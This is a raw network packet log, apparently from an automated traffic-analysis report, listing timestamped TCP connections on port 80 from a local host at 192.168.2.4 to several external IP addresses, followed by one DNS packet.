                        Sep 3, 2024 10:44:49.751049995 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:45:02.952416897 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.958704948 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:02.958909035 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.977329969 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.983841896 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:04.484355927 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:04.532448053 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:05.501224041 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.506175995 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:05.506232023 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.518990040 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.524131060 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:07.030105114 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:07.080043077 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.046056986 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.050879002 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.050955057 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.061650038 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.066593885 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066603899 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066612959 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066665888 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066715002 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066724062 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066740036 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066749096 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066807032 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:09.012232065 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:09.012356043 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:09.574570894 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:09.619977951 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:10.592971087 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.597871065 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:10.597945929 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.606331110 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.611222982 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:12.494844913 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:12.498529911 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:17.805140018 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:17.805191994 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:17.806251049 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:17.806296110 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:18.030458927 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:18.030503988 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:18.031338930 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:18.035782099 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.394939899 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.395119905 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.395179987 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:20.397368908 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:20.402089119 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:33.998233080 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.003540993 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.003601074 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.016371965 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.021184921 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598315954 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598408937 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598530054 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.598552942 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598602057 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:35.527631044 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.561783075 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.566713095 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:36.570483923 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.582380056 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.588871956 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169241905 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169294119 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169363976 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:37.169419050 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169528008 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:38.092219114 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.108536005 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.113651037 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.113763094 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.124440908 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.129358053 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129368067 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129378080 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129462004 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129511118 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129525900 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129544020 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129553080 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129579067 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695467949 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695763111 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695804119 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.776156902 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.776206017 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:40.640517950 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.656864882 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.665982008 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:41.666050911 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.674700022 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.679595947 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270127058 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270142078 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270152092 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270163059 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270172119 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270205975 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270262957 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.270297050 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.274518013 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.279278994 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:47.301105976 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.305993080 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.306335926 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.317398071 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.322393894 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.751764059 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.751812935 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:48.824516058 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.137396097 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.752388954 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.752405882 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.752526045 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.844386101 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.849303007 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.849365950 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.862255096 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.867731094 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:51.371433020 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:51.377053022 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:51.381829977 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.390779018 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.401364088 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.401441097 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.414859056 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.421091080 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421101093 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421109915 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421119928 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421133041 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421140909 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421155930 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421164989 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421173096 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.847122908 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.847259998 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:53.918350935 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:53.923403978 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:54.936706066 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.941749096 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:54.945386887 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.952425957 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.957216978 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388154984 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388233900 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388442993 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:55.390738010 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:55.395747900 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:46:01.259649992 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.264470100 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:01.264709949 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.274671078 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.279572964 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214585066 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214606047 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214617968 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214732885 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:02.777811050 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.797317028 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.802196980 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:03.802300930 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.816143990 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.821019888 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760212898 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760230064 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760240078 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760258913 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760329962 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:05.326414108 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.342995882 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.348059893 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.348149061 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.358516932 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.364630938 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364641905 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364650011 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364653111 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364661932 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364670992 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364685059 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364694118 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364702940 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584222078 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584239006 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584252119 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584263086 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584283113 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:07.584315062 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:07.871419907 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.892433882 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.898283958 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:08.901439905 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.910420895 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.916677952 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873079062 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873096943 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873106956 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873119116 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873128891 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873142004 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873236895 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.873266935 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.878377914 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.883152962 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:15.628159046 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.634649992 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:15.634716988 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.750397921 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.755393028 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:16.082032919 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:16.082123995 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:17.262085915 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:17.267206907 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.361733913 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.367186069 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.367253065 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.400696993 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.405704021 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.921907902 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.924551964 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:19.918304920 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:19.923537016 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.936418056 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.941997051 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.942147970 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.992312908 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.998146057 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998178959 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998240948 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998251915 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998265028 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998274088 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998337030 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998344898 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998352051 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:21.416824102 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:21.417013884 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:22.512120962 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:22.517118931 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:23.534440994 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.539525986 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:23.542526960 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.549416065 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.554250002 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035274029 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035291910 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035408020 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:24.077847958 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:24.082673073 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:37.262948990 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.267793894 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.270528078 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.280910969 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.285695076 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934391975 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934467077 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934520006 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:38.804158926 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.812432051 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.817373037 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:39.817441940 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.831772089 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.836649895 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500349998 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500456095 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500504971 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:41.340228081 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.359532118 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.364423990 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.364497900 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.378850937 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.383708000 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383718014 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383748055 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383760929 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383771896 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383920908 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383929014 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.384013891 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.384021997 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:43.036572933 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:43.036608934 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:43.036727905 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:43.887161016 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:44.906467915 CEST6501880192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:44.911344051 CEST806501885.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:44.914568901 CEST6501880192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:44.921449900 CEST6501880192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:44.926254034 CEST806501885.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:45.583260059 CEST806501885.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:45.583384991 CEST806501885.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:45.584688902 CEST6501880192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:45.588485003 CEST6501880192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:45.593544960 CEST806501885.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:50.747379065 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:50.752306938 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:50.757488012 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:50.765615940 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:50.770431995 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:51.843858957 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:51.843878031 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:51.843888044 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:51.843934059 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:51.843934059 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:52.082355022 CEST8065019188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:52.082405090 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:52.278079033 CEST6501980192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:53.297483921 CEST6502080192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:53.304629087 CEST8065020188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:53.306600094 CEST6502080192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:53.322487116 CEST6502080192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:53.328233957 CEST8065020188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:54.222376108 CEST8065020188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:54.223244905 CEST8065020188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:54.223315001 CEST6502080192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:54.828511953 CEST6502080192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:55.843957901 CEST6502180192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:55.848828077 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.848896980 CEST6502180192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:55.862021923 CEST6502180192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:55.866986036 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.866997957 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867089987 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867099047 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867160082 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867168903 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867183924 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867192984 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:55.867199898 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:56.812345982 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:56.812608004 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:56.812757969 CEST8065021188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:56.818564892 CEST6502180192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:57.374485970 CEST6502180192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:58.389928102 CEST6502280192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:58.394860983 CEST8065022188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:58.394936085 CEST6502280192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:58.401916027 CEST6502280192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:58.408644915 CEST8065022188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:59.348114014 CEST8065022188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:59.349360943 CEST8065022188.114.97.3192.168.2.4
                        Sep 3, 2024 10:46:59.349419117 CEST6502280192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:59.354482889 CEST6502280192.168.2.4188.114.97.3
                        Sep 3, 2024 10:46:59.359266996 CEST8065022188.114.97.3192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 3, 2024 10:43:30.682430029 CEST6258253192.168.2.41.1.1.1
